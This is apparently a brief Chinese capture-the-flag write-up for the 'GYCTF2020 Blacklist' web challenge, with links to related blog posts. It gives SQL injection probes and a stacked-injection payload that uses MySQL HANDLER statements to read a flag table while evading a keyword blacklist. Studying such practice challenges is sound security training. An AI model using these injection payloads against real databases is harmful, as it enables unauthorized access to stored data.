[GYCTF2020]Blacklist 1
1.发现
1.1打开题目地址,随便注入,1" or 1=1 #
1.2union select database()
2.步骤
2.1输入payload,得到flag。
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#
知识点
1)堆叠注入
3.借鉴
[GYCTF2020]Blacklist - 高诺琪 - 博客园 (cnblogs.com)
堆叠注入tips - MustaphaMond - 博客园 (cnblogs.com)
从宽字节注入认识PDO的原理和正确使用 - FreeBuf网络安全行业门户
浙公网安备 33010602011771号